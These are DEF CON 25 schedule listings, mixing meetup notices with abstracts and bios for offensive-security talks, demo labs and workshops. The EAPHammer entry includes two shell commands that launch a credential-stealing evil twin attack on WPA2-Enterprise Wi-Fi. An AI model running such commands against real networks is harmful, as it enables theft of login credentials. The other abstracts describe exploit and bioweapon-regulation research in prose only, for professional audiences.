Date: Friday, July 28th, 2017
Time: 6:00pm
General Information I will gather some chairs and tables in the corner of the bar and defend them with my life if necessary.... Okay, maybe not my life, but I will do my best to make people too uncomfortable to sit in the area if they are not part of the meetup. And as always, please ask around for me if you can't find us or message me, I promise not to bite! And as always, please keep your snacks close by unless you want /u/1o57 to eat them.

T-Shirt Swap & Clothing Drive - In addition to our normal mingling, drinking, and general shenanigans, some of us will also be doing a T-shirt swap and clothing drive. Bring a couple shirts to swap, and any items of clothing that you would like to donate to a local charity (TBD). I will be personally bringing a trash-bag full of clothes to donate, and I would highly encourage you to bring your gently used clothes as well! Let's make an impact in the name of our sub!!

BONUS ROUND - Our afterparty will graciously be sponsored by the Monero Enterprise Alliance and our friends over at /r/Monero. Details to come.

Return to Index      -     

 

Night Life - Sunset Park Pavilion F - Thursday - 16:00-22:00


Title:
DEFCON Toxic BBQ

Toxic BBQ will be held on Thursday afternoon, 7/27, at Sunset Park Pavilion F from 16:00 to 22:00. (36.0636, -115.1178)

The humans of Vegas invite everyone to a barbecue and meetup at Sunset Park, Pavilion F. Kick off the con on Thursday afternoon with food, beer, and conversation at this unofficial welcome party.

Basic supplies will be provided (read: burgers, dogs, charcoal, plates). Bring sides, snacks, and spirits to fill out the smorgasbord. Hit the grocery (or liquor) store before arriving, or catch a ride once you arrive. Gifts for those that chip in to make the BBQ awesome:
- Grill masters
- Supply Runners
- Those that bring exotic meats
- Those that bring exotic brews (local or home brews)
- Carpool members, ride coordination, transportation help

We are going to host local Vegas HAMmers for an impromptu meetup. If your group would like to stage at the BBQ, let me know in the comments below. PM me if you can help with supplies or transport.

Credit to graverobber and all those that made this unofficial kickoff the best place to stuff your face year after year. This is an informal meetup, and costs are covered by humans like you
Toxic BBQ for DC25
Location
Return to Index      -     

 

CHV - Village Talks Outside Contest Area, Pool Level - Friday - 16:00-16:59


DefCon Unofficial Badges Panel

No description available


Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Sunday - 11:10-11:59


Demystifying the OPM Breach: WTF Really Happened

Ron Taylor

In September 2016 the House Committee on oversight finally released their report. Four years after the original breach, we are still asking how the f*#! did this happen. This talk with go over the key findings of the report and the impact on those who were effected.

Ron Taylor (Twitter: @Gu5G0rman) has been in the Information Security field for almost 20 years. Ten of those years were spent in consulting where he gained experience in many areas. In 2008, he joined the Cisco Global Certification Team as an SME in Information Assurance. In 2012, he moved into a position with the Security Research and Operations group (PSIRT) where his focus was mostly on penetration testing of Cisco products and services. He was also involved in developing and presenting security training to internal development and test teams globally. Additionally, he provided consulting support to many product teams as an SME on product security testing. In his current role, he is a Consulting Systems Engineer specializing in Cisco's security product line. Certifications include GPEN, GWEB, GCIA, GCIH, GWAPT, RHCE, CCSP, CCNA, CISSP and MCSE. Ron is also a Cisco Security Blackbelt, SANS mentor, Co-Founder and President of the Raleigh BSides Security Conference, and member of the Packet Hacking Village team at DEF CON.


Return to Index      -     

 

DEFCON - Track 1 - Saturday - 13:00-13:45


Demystifying Windows Kernel Exploitation by Abusing GDI Objects.

Saturday at 13:00 in 101 Track

45 minutes | Demo, Exploit

5A1F (Saif El-Sherei) Security Analyst, SensePost

Windows kernel exploitation is a difficult field to get into. Learning the field well enough to write your own exploits require full walkthroughs and few of those exist. This talk will do that, release two exploits and a new GDI object abuse technique.

We will provide all the detailed steps taken to develop a full privilege escalation exploit. The process includes reversing a Microsoft's patch, identifying and analyzing two bugs, developing PoCs to trigger them, turning them into code execution and then putting it all together. The result is an exploit for Windows 8.1 x64 using GDI bitmap objects and a new, previously unreleased Windows 7 SP1 x86 exploit involving the abuse of a newly discovered GDI object abuse technique.

5A1F (Saif El-Sherei)
Saif is a senior analyst with SensePost. He has a keen interest in exploit development and sharing everything he learns. Over the years he has released several exploitation tutorials, examples and a grammar-based browser fuzzer, wadi (DEF CON 23).

@saif_sherei


Return to Index      -     

 

BHV - Pisa Room - Saturday - 18:30-18:30


Title: Designer Babies

Speaker: Christian and Erin
@cdameffMDDr

About Christian and Erin:
Christian "quaddi" Dameff MD MS
Christian (quaddi) Dameff is an emergency medicine physician, former open capture the flag champion, prior DEF CON speaker, and researcher. Published works include topics such as therapeutic hypothermia after cardiac arrest, novel drug targets for myocardial infarction patients, and other Emergency Medicine related works with an emphasis on CPR optimization. Security research topics including hacking critical healthcare infrastructure and medical devices. This is his thirteenth DEF CON.

Erin Hefley is a resident physician in her final year of training with the Phoenix Integrated Residency in Obstetrics & Gynecology. She has a background in public health and women's health, and obtained a Master of Public Health degree from the University of Northern Colorado prior to attending medical school at the University of Arizona - Phoenix. This is her 6th Defcon attendance over the past decade, and she is thrilled to have witnessed the development and expansion of the Biohacking Village. Her current interests include reproductive health technology, women's health policy, running, and vampire erotica

Abstract:
An estimated 30 million Americans and 300 million people worldwide suffer from genetic disease, and 15% of American couples are affected by infertility. Current assisted reproductive technology is used to prevent genetic disease and assist with conception. Human capabilities are rapidly advancing past the present application of these technologies, providing exciting possibilities for selecting and enhancing characteristics of our offspring in the brave new world of 21 st century medicine.
This discussion will outline current reproductive science in the US and abroad, and discuss the bioethical, legal, and medical consequences of a future where babies can be designed to specification.



Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Friday - 16:00-16:55


Robert Ghilduta

Bio

Interests include SDRs (bladeRF), RF, DSP, embedded programming, hardware design, modern control systems, UAVs, and information security.

@robertghilduta

Designing an Automatic Gain Control

Abstract

The presentation will describe the requirements and design methodology behind the bladeRF's newly released VHDL Automatic Gain Control. The talk will walk SDR beginners through the RF gain architecture of modern radios and explain why gain control is required. The talk will then use the bladeRF as an example, and show what it took to develop the AGC in VHDL.


Return to Index      -     

 

DEFCON - Track 4 - Saturday - 15:00-15:45


Digital Vengeance: Exploiting the Most Notorious C&C Toolkits

Saturday at 15:00 in Track 4

45 minutes | Demo, Tool, Exploit

Professor Plum Hacker

Every year thousands of organizations are compromised by targeted attacks. In many cases the attacks are labeled as advanced and persistent which suggests a high level of sophistication in the attack and tools used. Many times, this title is leveraged as an excuse that the events were inevitable or irresistible, as if the assailants' skill set is well beyond what defenders are capable of. To the contrary, often these assailants are not as untouchable as many would believe.

If one looks at the many APT reports that have been released over the years some clear patterns start to emerge. A small number of Remote Administration Tools are preferred by actors and reused across multiple campaigns. Frequently sited tools include Gh0st RAT, Plug-X, and XtremeRAT among others. Upon examination, the command and control components of these notorious RATs are riddled with vulnerabilities. Vulnerabilities that can be exploited to turn the tables from hunter to hunted.

The presentation will disclose several exploits that could allow remote execution or remote information disclosure on computers running these well-known C&C components. It should serve as a warning to those actors who utilize such toolsets. That is to say, such actors live in glass houses and should stop throwing stones.

Professor Plum
Professor Plum is an experienced reverse engineer, developer, and digital forensics examiner. He holds a graduate degree in Information Security from Johns Hopkins University, and has worked numerous computer incident investigations spanning the globe. He currently works as a Senior Threat Researcher for a Fortune 500 cybersecurity company and previously worked for the Department of Defense performing vulnerability research, software development, and Computer Network Operations.

@professor__plum


Return to Index      -     

 

ICS - Calibria - Saturday - 10:30-10:59


Title: Dissecting industrial wireless implementations.

Wireless technologies are seeing increased use on the plant floor to enable pervasive monitoring and control of processes. Off-the-shelf security tools focus on assessing the security properties of commercial and consumer protocols such as 802.11 and Bluetooth. Several new standards have emerged for use in industrial environments. In this talk, Blake will offer an introduction to Software Defined Radio (SDR) tools and their application in industrial security assessments. We will review two protocols based on 802.15.4, including industry standard WirelessHART. Blake will cover how to understand the security properties of RF protocols through integration with familiar tools such as Wireshark. The goal is to leave the audience with the knowledge to get started exploring their RF environment with GNU Radio and low-cost SDR tools and to stress the importance of including RF when threat modeling a system or facility.


Bio: Blake Johnson

Blake works on the Industrial Control System Cybersecurity Team at Mandiant. His work history includes time in the electric power generation and distribution (@AlliantEnergy) industry as well as a global retailer (@Amazon). He has been a radio hobbyist for 15 years and has been using software defined radios for security testing for the last 3.



Return to Index      -     

 

BHV - Pisa Room - Saturday - 13:00-13:29


Title: DIYBioweapons and Regulation

Speaker: Meow Ludo Meow Meow

About Meow Ludo Meow Meow:
Meow-Ludo is the founder of biohacking in Australia, and works full time running BioFoundry. He is a full-time hacker, part-time federal political candidate, and is interested in interdisciplinary projects.He is interested in the ability of biohackers to create bioweapons and the regulations that aim to control them.

Abstract:
Meow will be presenting on the capabilities for biological weapons that are currently able to be produced in home or community bio labs. He will explore the role that emerging technologies play in drastically reducing the technological and cost barriers to creating these constructs, and suggest ways that legislation and regulation may be employed to ensure maximum freedoms and innovation coupled with effective monitoring. Make sure to get your vaccinations before attending please.



Return to Index      -     

 

DEFCON - Track 3 - Saturday - 12:00-12:45


DNS - Devious Name Services - Destroying Privacy & Anonymity Without Your Consent

Saturday at 12:00 in Track 3

45 minutes | Art of Defense

Jim Nitterauer Senior Security Specialist, AppRiver, LLC

You've planned this engagement for weeks. Everything's mapped out. You have tested all your proxy and VPN connections. You are confident your anonymity will be protected. You fire off the first round and begin attacking your target. Suddenly something goes south. Your access to the target site is completely blocked no matter what proxy or VPN you use. Soon, your ISP contacts you reminding you of their TOS while referencing complaints from the target of your engagement. You quickly switch MAC addresses and retry only to find that you are quickly blocked again!

What happened? How were you betrayed? The culprit? Your dastardly DNS resolvers and more specifically, the use of certain EDNS0 options by those resolvers.

This presentation will cover the ways in which EDNS OPT code data can divulge details about your online activity, look at methods for discovering implementation by upstream DNS providers and discuss ways in which malicious actors can abuse these features. We will also examine steps you can take to protect yourself from these invasive disclosures.

The details covered will be only moderately technical. Having a basic understanding of RFC 6891 and general DNS processes will help in understanding. We will discuss the use of basic tools including Wireshark, Packetbeat, Graylog and Dig.

Jim Nitterauer
Currently a Senior Security Specialist at AppRiver, LLC., his team is responsible for global network deployments and manages the SecureSurf global DNS infrastructure and SecureTide global spam & virus filtering infrastructure as well as all internal applications. They also manage security operations for the entire company. He holds a CISSP certification. He is also well-versed in ethical hacking and penetration testing techniques and has been involved in technology since the late 1980s when punch cards were still a thing.

Jim has presented at NolaCon, ITEN WIRED, BSides Las Vegas, BSides Atlanta, CircleCityCon and several smaller conferences. He regularly attends national security conferences and is passionate about conveying the importance of developing, implementing and maintaining security policies for organizations. His talks convey unique and practical techniques that help attendees harden their security in practical and easy-to-deploy ways.

Jim is a senior staff member with BSides Las Vegas, a member of the ITEN WIRED Planning Committee and the president of the Florida Panhandle (ISC)2 Chapter. When not at the computer, Jim can be found working out, playing guitar, traveling or just relaxing with an adult beverage.

Twitter: @jnitterauer
LinkedIn: https://www.linkedin.com/in/jnitterauer/


Return to Index      -     

 

Demolabs - Table 2 - Saturday - 16:00-17:50


DNS-Exfil-Suite

Nolan Berry

Cory Schwartz

Saturday from 1600-1750 at Table Two

Audience: I think the best audience here would be PenTesters, DNS Engineers and people looking to learn more about DNS based attack methods.

Our tool kit provides multiple methods of data exfiltration, infiltration and botnet command and control systems using 100% DNS traffic that is either hard to detect or impossible to detect.

https://github.com/ndberry/DNS_Exfil_Tool

Nolan Berry
DNS Engineer
-----------
Nolan has been working with DN for 2 years and has always been very interested in security. His passion for both security and DNS has led him to work and develop a platform for DNS exploitation in an attempt to raise awareness of known but under appreciated security flaws.

Cory Schwartz
Site Reliability Engineer
Twitter
----------
Cory has a past working on signals intelligence and processing after graduating with a degree in cryptography he served in the Air Force and then as a government contractor helping the intelligence community. After that he worked at Rackspace on CloudStorage and systems automation. Now he is an SRE at Twitter in San Fransisco.


Return to Index      -     

 

RCV - Palermo room, Promenade level - Sunday - 11:25-11:55


Do Tinder Bots Dream of Electric Toys? How Tinder Bots are breaking hearts all over the world, and trashing Tinder’s reputation while they’re at it.

Abstract

Tinder. The Final Frontier. Pick gorgeous (or not so gorgeous) members of your desired sex with the tip of your finger, at the comfort of your sofa, your bed, and let’s admit it - your toilet seat…

Research shows that there are 50 million active users on Tinder, who check their accounts 11 times per day and spend an average of 90 minutes per day on the app. Even celebrities, it seems. [Marie Claire]

In the name of Science, I decided to sacrifice myself and delve into the world of Tinder Dating. At first, I was detecting patterns in photos, in poses, in language and in attitude, all over the world! But suddenly something else showed up on my radar: Bots. And not just one - I was being surrounded. Imagine the heartbreak of matching 7 gorgeous women in a Scandinavian capital, only to discover that not only were they in reality bots, but they actually had an agenda!

In this talk I’ll describe the research, how I came to discover that Bots were not an isolated case, and how I uncovered the pattern behind generating the profiles. I’ll also break down the infrastructure behind the operation, and show who’s behind a campaign that spawned over multiple countries and continents. I’ll give multiple examples, from Tinder as well as from other platforms, of how bots operate under the radar of the site owners and carry out their agenda.

Speaker Profile

Inbar (@inbarraz) has been teaching and lecturing about Internet Security and Reverse Engineering for nearly as long as he has been doing that himself. He started programming at the age of 9 on his Dragon 64. At 13 he got a PC, and promptly started Reverse Engineering at the age of 14. Through high-school he was a key figure in the Israeli BBS scene. He spent most of his career in the Internet and Data Security field, and the only reason he’s not in jail right now is because he chose the right side of the law at an early age.

Inbar specializes in outside-the-box approach to analyzing security and finding vulnerabilities. From late 2011 to late 2014 he was running the Malware and Security Research at Check Point, using his extensive experience of over 20 years in the Internet and Data security fields. He has presented at a number of conferences, including Kaspersky SAS, Hack.lu, CCC, Virus Bulletin, ZeroNights, ShowMeCon, several Law Enforcement events and Check Point events.

These days, Inbar is performing fascinating research on Bots and Automated Attacks at PerimeterX, and educating both customers and the public about the subjects.


Return to Index      -     

 

RCV - Palermo room, Promenade level - Saturday - 12:10-12:59


Domain discovery, expanding your scope like a boss

Abstract

Whether you do wide scope pentesting or bounty hunting, domain discovery is the 1st method of expanding your scope. Join Jason as he walks you through his tool chain for discovery including; subdomain scraping, bruteforce, ASN discovery, permutation scanning, automation, and more!

Speaker Profile

Jason Haddix (@Jhaddix)

I spoke at DC 23 on a talk called “how to shot web”.


Return to Index      -     

 

DEFCON - Track 3 - Saturday - 15:00-15:45


DOOMed Point of Sale Systems

Saturday at 15:00 in Track 3

45 minutes | Demo, Exploit

trixr4skids Security Engineer

In response to public security breaches many retailers have begun efforts to minimize or completely prevent the transmission of unencrypted credit card data through their store networks and point of sale systems. While this is definitely a great improvement over the previous state of affairs; it places the security of transactions squarely in the hands of credit card terminals purchased from third party vendors. These terminals have a security posture that is often not well understood by the retail chains purchasing them. To better understand if the trust placed in these devices is warranted, the attack surface and hardening of a commonly deployed credit card terminal series is reviewed and a discussion of reverse engineered security APIs is presented. Despite the reduced attack surface of the terminals and hardened configuration, attacks that allow recovery of magstripe track data and PIN codes are demonstrated to be possible.

trixr4skids
trixr4skids is a security engineer and a recovering consultant. He enjoys hardware hacking, reverse engineering, the occasional webapp RCE, robots, beer, and of course robots that bring him beer. As a child he enjoyed taking apart everything he could get his hands on in a quest to figure out how it worked (his parents did not always appreciate this). He could never figure out what the green rectangles with the black rectangles on them did and often resorted to smashing them with a hammer to see what was inside. Since then he has learned more effective ways to go about discovering the secrets those black things are hiding and even how to make them do different things than intended. His current research projects include attacking embedded devices based on the rabbit 2000/3000 CPUs, studying the security of payment card systems, and hacking anything interesting that he can buy off eBay.

@trixr4skids


Return to Index      -     

 

DEFCON - Track 1 - Saturday - 12:00-12:45


Driving down the rabbit hole

Saturday at 12:00 in 101 Track

45 minutes | Demo

Mickey Shkatov Security Researcher, McAfee.

Jesse Michael Security Researcher, McAfee.

Oleksandr Bazhaniuk Security Researcher

Over the past few years, cars and automotive systems have gained increasing attention as cyber-attack targets.  Cars are expensive.  Breaking cars can cost a lot.  So how can we find vulnerabilities in a car with no budget?  We’ll take you with us on a journey from zero car security validation experience through the discovery and disclosure of multiple remotely-exploitable automotive vulnerabilities.  Along the way, we’ll visit a wrecking yard, reassemble (most) of a 2015 Nissan Leaf in our lab, discuss how we picked our battles, fought them, and won.  During our talk, we’ll examine the details of three different classes of vulnerabilities we found in this vehicle, how they can be exploited, and the potential ramifications to the owner of their real-world exploitation.  We’ll also discuss the broader scope of the vulnerabilities discovered, how they extend beyond just this specific vehicle, and what the industry can do better to prevent these types of problems in the future.

Mickey Shkatov
Mickey Shkatov is a security researcher and a member of the McAfee Advanced Threat Research team. His areas of expertise include vulnerability research, hardware and firmware security, and embedded device security

@HackingThings

Jesse Michael
Jesse Michael has been working in security for over a decade and is currently a member of the McAfee Advanced Threat Research team who spends his time causing trouble and finding low-level hardware security vulnerabilities in modern computing platforms

@jessemichael

Oleksandr Bazhaniuk
Oleksandr Bazhaniuk is a security researcher and reverse engineer with background in automation of binary vulnerability analysis. He is also a co-founder of DCUA, the first DEF CON group in Ukraine.

@ABazhaniuk


Return to Index      -     

 

Night Life - Track 2 - Saturday - 20:00-24:00


Title:
Drunk Hacker History

Drunk Hacker History
Return to Index      -     

 

Demolabs - Table 5 - Saturday - 16:00-17:50


EAPHammer

Gabriel Ryan

Saturday from 1600-1750 at Table Five

Audience: Offensive security professionals, red teamers, penetration testers, researchers.

EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate how fast this tool is, here's an example of how to setup and execute a credential stealing evil twin attack against a WPA2-TTLS network in just two commands:

# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth ttls --wpa 2 --essid CorpWifi --creds

Features:
* Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
* Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
* Perform captive portal attacks
* Built-in Responder integration
* Support for Open networks and WPA-EAP/WPA2-EAP
* No manual configuration necessary for most attacks.
* No manual configuration necessary for installation and setup process

https://github.com/s0lst1c3/eaphammer

Gabriel Ryan
Gabriel Ryan is a security consultant and researcher with a passion for wireless and infrastructure testing. He currently works for Gotham Digital Science at their New York office, where he provides full scope red team penetration testing capabilities for a diverse range of clients. He also contributes heavily to his company's research division, GDS Labs. Previously, Gabriel has worked as a penetration tester and researcher for the Virginia-based defense contractor OGSystems, and as a systems programmer for Rutgers University. He also is a member of the BSides Las Vegas senior staff, coordinating wireless security for the event. In his spare time, he enjoys live music, exploring the outdoors, and riding motorcycles.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 5 - Saturday - 10:30-14:30


Edge cases in web hacking

Saturday, 10:30 to 14:30 in Octavius 5

John Poulin Principal Application Security Consultant, nVisium

Learn how to identify, exploit, and chain web-app vulnerabilities that you don't see every day. These vulnerabilities will include Server-Side Template Injection, Serialization vulnerabilities and more. We will identify how common protection mechanisms in languages such as Ruby on Rails, Django and PHP can be bypassed/exploited.

Prerequisites: Basic experience with common web hacking, including Cross-Site Scripting, SQL Injection, Remote Code Execution and more.

Materials: Laptop with VMWare or Virtualbox.

Max students: 90 | Registration: https://dc25_poulin.eventbrite.com (Sold out!)

John Poulin
John is a Principal Application Security Consultant who specializes in web application security. John has over 9 years of experience in development, management, and code analysis of web applications. John specializes in Ruby on Rails applications, but is happy to work in any MVC framework. John is leading the development of a tool called Httpillage, which provides the ability to perform distributed attacks against web applications. He also plays a role in developing and maintaining nVisium's internal security services. John graduated from the University of Maine with a degree in Computer Science and a minor in German.


Return to Index      -     

 

DEFCON - Track 4 - Saturday - 11:00-11:30


Evading next-gen AV using artificial intelligence

Saturday at 11:00 in Track 4

20 minutes | Demo

Hyrum Anderson Technical Director of Data Science, Endgame

Much of next-gen AV relies on machine learning to generalize to never-before-seen malware. Less well appreciated, however, is that machine learning can be susceptible to attack by, ironically, other machine learning models. In this talk, we demonstrate an AI agent trained through reinforcement learning to modify malware to evade machine learning malware detection. Reinforcement learning has produced game-changing AI's that top human level performance in the game of Go and a myriad of hacked retro Atari games (e.g., Pong). In an analogous fashion, we demonstrate an AI agent that has learned through thousands of "games" against a next-gen AV malware detector which sequence of functionality-preserving changes to perform on a Windows PE malware file so that it bypasses the detector. No math or machine learning background is required; fundamental understanding of malware and Windows PE files is a welcome; and previous experience hacking Atari Pong is a plus.

Hyrum Anderson
Hyrum Anderson is technical director of data scientist at Endgame, where he leads research on detecting adversaries and their tools using machine learning. Prior to joining Endgame he conducted information security and situational awareness research as a researcher at FireEye, Mandiant, Sandia National Laboratories and MIT Lincoln Laboratory. He received his PhD in Electrical Engineering (signal and image processing + machine learning) from the University of Washington and BS/MS degrees from Brigham Young University. Research interests include adversarial machine learning, deep learning, large-scale malware classification, active learning, and early time-series classification.


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 17:00-17:59


Title:
Everything you wanted to know about orchestration but were afraid to ask.

1700 Saturday
redbeard
@brianredbeard
Everything you wanted to know about orchestration but were afraid to ask.

"Who doesn't dream of getting that big score: a remote shell inside of Google. But what would it get you? The compute mechanisms of ""web scale"" and ""cloud native"" companies are often wildly unlike those of smaller companies. At Twitter Apache Mesos rules the day. Google is the mastermind behind Borg and Kubernetes (ne Seven of Nine). At Facebook FBAR is one tool of many used to keep everything running.

This talk aims to give visibility into ""the way things work"" in the second half of the second decade of the 21st century and lemme tell you, it's not LAMP stacks anymore. "

Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 5 - Saturday - 14:30-18:30


Exploitation/Malware Forward Engineering

Saturday, 14:30 to 18:30 in Octavius 5

Sean Dillon Senior Security Analyst, RiskSense, Inc.

Zachary Harding Senior Security Analyst, RiskSense, Inc.

Windows post-exploitation is the penetrating step of every penetration test if you're on a Windows network. You're obviously swimming in shells (it's Windows after all), but you aren't in full control yet. Your best account is Network Service and you want Enterprise Admin.

Elevating privileges, either through bypassing UAC or finding local exploits, stealing tokens, pivoting to other systems, scanning the local network, dumping credentials. There are few open source tools available, such as PowerShell Empire, Koadic C3, and Metasploit's Meterpreter. We will go through the low-level code that makes it all work.

The training will explore shellcode, COM, WMI, Windows API, and .NET, and how these open source tools bring it all together. You will walk away with the knowledge to write your own plugins for these systems, as well as your own custom malware. An in-depth understanding of antivirus detection and evasion will be included. This workshop is a focus on the code, not just the tactics.

Prerequisites: Programming knowledge, one or all of the following: x86/x64, Python, JavaScript, PowerShell, Ruby, C Pentesting knowledge: Basic Windows post-exploitation

Materials: Bring favorite OS and code editor, Windows VMs, WiFi.

Max students: 90 | Registration: https://dc25_dillon.eventbrite.com (Sold out!)

Sean Dillon
Sean Dillon is a senior security analyst at RiskSense, Inc. He has an established research focus on attacking the Windows kernel, and was the first to reverse engineer the DOUBLEPULSAR SMB backdoor. He is a co-author of the ETERNALBLUE Metasploit module and other contributions to the project. He has previously been a software engineer in the avionics and insurance industries, and his favorite IDE is still GW-Basic on DOS.

Zachary Harding
Zach Harding is a senior security analyst at RiskSense, Inc. Zach formerly served in the US Army as a combat medic. He, along with Sean Dillon and others, improved leaked NSA code to release the "ExtraBacon 2.0" Cisco ASA exploit package. He is an avid tester of every penetration tool he can get a hold of. You know the guy who's always looking for available public WiFi, or fiddling with a kiosk machine? That's Zach.


Return to Index      -     

 

DEFCON - Track 2 - Thursday - 15:20-15:40


Exploiting 0ld Mag-stripe information with New technology

Thursday at 15:20 in 101 Track 2

20 minutes | Demo, Tool, Exploit

Salvador Mendoza Hacker

A massive attack against old magnetic stripe information could be executed with precision implementing new technology. In the past, a malicious individual could spoof magstripe data but in a slow and difficult way. Also brute force attacks were tedious and time-consuming. Technology like Bluetooth could be used today to make a persistent attack in multiple magnetic card readers at the same time with audio spoof.

Private companies, banks, trains, subways, hotels, schools and many others services are still using magstripe information to even make monetary transactions, authorize access or to generate "new" protocols like MST(Magnetic Secure Transmission) During decades the exploitation of magstripe information was an acceptable risk for many companies because the difficulty to achieve massive attacks simultaneously was not factible. But today is different.

Transmitting magstripe information in audio files is the faster and easier way to make a cross-platform magstripe spoofer. But how an attacker could transmit the audio spoof information to many magnetic card readers at the same time? In this talk, we will discuss how an attacker could send specific data or achieve a magstripe jammer for credit card terminals, PoS or any card reader. Also, how it could be implemented to generate brute force attacks against hotel door locks or tokenization processes as examples.

Salvador Mendoza
Salvador Mendoza is a security researcher focusing in tokenization processes, mag-stripe information and embedded prototypes. He has presented on tokenization flaws and payment methods at Black Hat USA, DEF CON, DerbyCon, Ekoparty, BugCON and Troopers. Salvador designed different tools to pentest mag-stripe and tokenization processes. In his designed toolset includes MagSpoofPI, JamSpay, TokenGet and lately SamyKam.

@Netxing
Blog: salmg.net


Return to Index      -     

 

DEFCON - Track 3 - Sunday - 11:00-11:45


Exploiting Continuous Integration (CI) and Automated Build systems

Sunday at 11:00 in Track 3

45 minutes | Demo, Tool, Exploit

spaceB0x Sr. Security Engineer at LeanKit Inc.

Continuous Integration (CI) systems and similar architecture has taken new direction, especially in the last few years. Automating code builds, tests, and deployments is helping hordes of developers release code, and is saving companies a great amount of time and resources. But at what cost? The sudden and strong demand for these systems have created some widely adopted practices that have large security implications, especially if these systems are hosted internally. I have developed a tool that will help automate some offensive testing against certain popular CI build systems. There has been a large adoption of initiating these builds through web hooks of various kinds, especially changes to public facing code repositories. I will start with a brief overview of some of the more popular CI tools and how they are being used in many organizations. This is good information for understanding, at a high level, the purpose of these systems as well as some security benefits that they can provide. From there we will dive into specific examples of how these different CI implementations have created vulnerabilities (in one case to a CI vendor themselves). Last we will explore the tool, its purpose, and a demonstration of its use. This tool takes advantage of the configurations of various components of the build chain to look for vulnerabilities. It then has the capability to exploit, persist access, command and control vulnerable build containers. Most of the demonstration will revolve around specific CI products and repositories, however the concepts are applicable across most build systems. The goal here is to encourage further exploration of these exploitation concepts. The tool is built "modularly" to facilitate this. If you are new to CI and automated build systems, or if you have been doing it for years, this talk and tool will help you to better secure your architecture

spaceB0x
spaceB0x is extremely dedicated to his work in information security. He is the Sr. Security Engineer at a software company called LeanKit. He likes, and occasionally succeeds at, security dev-opsing, web application and network penetration testing, and some other security things. He has written tools for secure key management within automation infrastructures, capturing netflow data, and pwning automated build systems. He loves the hacker community, learning new things, and exploring new ideas.

@spaceB0xx
Website: www.untamedtheory.com


Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Friday - 17:00-17:55


Failsafe: Yet Another SimplySafe Attack Vector

No description available


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 14:00-14:59


Title:
FERPA - Only Your Grades Are Safe; OSINT in Higher Education

1400 Saturday
Leah Figueroa/ Princess Leah
@Sweet_Grrl
FERPA - Only Your Grades Are Safe; OSINT in Higher Education

"Institutions of higher education are supposed to be somewhere that students go, earn a degree, and leave, all while their data is safe. Or is it? In this talk, I discuss the gaping security holes left by FERPA (Family Educational Rights and Privacy Act (20 U.S.C. 1232g; 34 CFR Part 99) with regard to student data. Almost all student data, with the exception of grades and select demographics picked by each institution, are commonly listed as directory information that is available to anyone who asks. Add to this most institutions of higher education commonly practice automatic opt-in for Directory Information and require students to specifically request that their information be withheld. This leads to an OSINT opportunity ripe for abuse. However, that is not the only issue. Due to a loophole in the way medical records are handled at institutions of higher education, these records can lose almost all protections and become classified as Directory Information. I show examples of how easily this information can be retrieved from several institutions and what sort of information is available from many institutions. At the conclusion of the talk, I illustrate the various ways this information can be potentially used against a victim or in the construction of a false identity."

Return to Index      -     

 

RCV - Palermo room, Promenade level - Sunday - 10:35-11:25


FERPA: Only Your Grades Are Safe; OSINT In Higher Education

Abstract

Institutions of higher education are supposed to be somewhere that students go, earn a degree, and leave, all while their data is safe. Or is it? In this talk, I discuss the gaping security holes left by FERPA (Family Educational Rights and Privacy Act (20 U.S.C. § 1232g; 34 CFR Part 99) with regard to student data. Almost all student data, with the exception of grades and select demographics picked by each institution, are commonly listed as directory information that is available to anyone who asks. Add to this most institutions of higher education commonly practice automatic “opt-in” for Directory Information and require students to specifically request that their information be withheld. This leads to an OSINT opportunity ripe for abuse.

However, that is not the only issue. Due to a loophole in the way medical records are handled at institutions of higher education, these records can lose almost all protections and become classified as Directory Information.

I show examples of how easily this information can be retrieved from several institutions and what sort of information is available from many institutions. At the conclusion of the talk, I illustrate the various ways this information can be potentially used against a victim or in the construction of a false identity.

Speaker Profile

Leah Figueroa (@Sweet_Grrl) is a 13 year veteran of the data analytics field and works as a data analyst in higher education. She holds a Master’s in Education, an ABD in research psychology, and has taught kindergarten.

A data aficionado, Leah focuses on research on improving student outcomes at the higher education level, including focusing on both minority student issues as well as issues pertaining to students who come from a background of poverty. While not at work, Leah is interested in increasing data security in the higher education sphere as well as improving blue teams by helping bring data analytics into the team. Leah also enjoys being a fiber artist (knitter) and loves cats, InfoSec, picking locks, cooking, and reading.


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 10:00-10:59


Title:
Financial Crime 2.0

1000 Friday
Marcelo Mansur
@thatinfosecrec
Financial Crime 2.0

After the feedback from last year's talk I'm bringing this back to go into more detail about some of the finer points, cover some new cases of who's been caught and materials such as shopping lists of financial secrets. This will delve deeper into the murky coalition between cybercriminals and traders and, of course, I'll be telling you all I told you so!

Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Saturday - 16:10-16:59


Fooling the Hound: Deceiving Domain Admin Hunters

Tom Sela, Head of Security Research at illusive networks

The conflict between cyber attackers and defenders is too often in favor of attackers. Recent results of graph theory research incorporated into red-team tools such as BloodHound, shift the balance even more dramatically towards attackers. Any regular domain user can map an entire network and extract the precise path of lateral movements needed to obtain domain admin credentials or a foothold at any other high-value asset. In this talk, we present a new practical defensive approach: deceive the attackers. Since the time of Sun Tzu, deceptions have been used on the battlefield to win wars. In recent years, the ancient military tactic of deceptions has been adopted by the cyber-security community in the form of HoneyTokens. Cyber deceptions, such as fictitious high-privilege credentials, are used as bait to lure the attackers into a trap where they can be detected. To shift the odds back in favor of the defenders, the same BloodHound graphs that are generated by attackers should be used by defenders to determine where and how to place bait with maximum effectiveness. In this way, we ensure that any shortest path to a high-value asset will include at least one deceptive node or edge.

